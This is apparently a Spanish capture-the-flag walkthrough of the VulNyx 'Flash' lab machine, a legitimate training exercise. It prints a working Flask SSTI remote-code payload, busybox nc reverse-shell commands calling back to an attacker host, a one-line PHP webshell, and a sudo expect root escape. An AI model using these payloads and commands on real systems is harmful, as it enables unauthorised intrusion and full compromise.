VulNyx - Flash
Information
Flash es una máquina virtual vulnerable Linux de dificultad fácil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.130
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 11:58 CEST
Nmap scan report for 192.168.1.130
Host is up (0.0011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
❯ nmap -sVC -p22,80,8080 192.168.1.130
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 11:59 CEST
Nmap scan report for 192.168.1.130
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
8080/tcp open http Werkzeug httpd 2.3.4 (Python 3.9.2)
|_http-server-header: Werkzeug/2.3.4 Python/3.9.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Shell (randy)
80/TCP (HTTP)
Site
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.130/ -x html,txt,php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.130/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 19]
Progress: 882180 / 882184 (100.00%)
===============================================================
Finished
===============================================================
8080/TCP (HTTP)
Site
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.130:8080/ html,txt,php --no-error
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.130:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
Server Site Template Injection (SSTI)
En el nmap inicial se identificó que el servidor HTTP está basado en Python, lo que sugiere que podría tratarse de una aplicación desarrollada con Flask, la cual podría ser vulnerable a ataques relacionados con la inyección de plantillas (SSTI)
8080/tcp open http Werkzeug httpd 2.3.4 (Python 3.9.2)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/2.3.4 Python/3.9.2
Parameter Brute Force
Identifico el parámetro name vulnerable a Server Site Template Injection (SSTI) con el payload {{5*5}}
❯ wfuzz -c -w /opt/common.txt -u "http://192.168.1.130:8080/?FUZZ={{5*5}}" --hh=18 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.130:8080/?FUZZ=
Total requests: 4746
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002812: 200 0 L 2 W 17 Ch "name"
Total time: 7.355892
Processed Requests: 4746
Filtered Requests: 4745
Requests/sec.: 645.1970
Reverse Shell
Consigo ejecutar comandos como usuario randy
❯ echo -n '{{request.application.__globals__.__builtins__.__import__("os").popen("id").read()}}' | jq -sRr @uri | xclip -sel clip
❯ curl -sX GET 'http://192.168.1.130:8080/?name=%7B%7Brequest.application.__globals__.__builtins__.__import__%28%22os%22%29.popen%28%22id%22%29.read%28%29%7D%7D'
<h2>Love uid=1000(randy) gid=1000(randy) grupos=1000(randy)
!</h2>#
Ya ejecutando comandos intento obtener una reverse shell
❯ echo -n '{{request.application.__globals__.__builtins__.__import__("os").popen("busybox nc 192.168.1.5 443 -e /bin/sh").read()}}' | jq -sRr @uri | xclip -sel clip
❯ curl -sX GET 'http://192.168.1.130:8080/?name=%7B%7Brequest.application.__globals__.__builtins__.__import__%28%22os%22%29.popen%28%22busybox%20nc%20192.168.1.5%20443%20-e%20%2Fbin%2Fsh%22%29.read%28%29%7D%7D'
Obtengo la shell como usuario randy
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.130] 58480
id ; hostname
uid=1000(randy) gid=1000(randy) grupos=1000(randy)
flash
Shell (www-data)
Enumeration
Config Files
En el archivo de configuración de Nginx, se observa que solo interpreta código PHP desde el dominio loveyouuuuu.nyx
randy@flash:~$ grep -v "#" /etc/nginx/sites-available/default
server {
listen 80 default_server;
listen [::]:80 default_server;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
server_name _;
location / {
try_files $uri $uri/ =404;
}
}
server {
listen 80;
listen [::]:80;
server_name loveyouuuuu.nyx;
root /var/www/html;
index index.html;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.4-fpm.sock;
}
}
Abuse
Creo una webshell PHP en la ruta /var/www/html
randy@flash:~$ echo -n '<?php system($_GET["cmd"]); ?>' > /var/www/html/cmd.php
Reverse Shell
Obtengo una shell como usuario www-data
❯ echo -n 'busybox nc 192.168.1.5 443 -e /bin/sh' | jq -sRr @uri | xclip -sel clip
❯ curl -sX GET -H "Host: loveyouuuuu.nyx" "http://192.168.1.130/cmd.php?cmd=busybox%20nc%20192.168.1.5%20443%20-e%20%2Fbin%2Fsh"
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.130] 35328
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
flash
Privilege Escalation
Enumeration
Sudo
El usuario www-data puede ejecutar como root el binario expect con sudo
www-data@flash:/$ sudo -l
Matching Defaults entries for www-data on flash:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on flash:
(root) NOPASSWD: /usr/bin/expect
Abuse
En GTFOBins nos dan la secuencia de shell-escape y me convierto en usuario root
www-data@flash:/$ sudo -u root /usr/bin/expect -c 'spawn /bin/sh;interact'
spawn /bin/sh
# bash -i
root@flash:/# id ; hostname
uid=0(root) gid=0(root) groups=0(root)
flash
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@flash:/# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
3838****************************
bc73****************************
Hasta aquí la resolución de la máquina Flash.
Happy Hacking!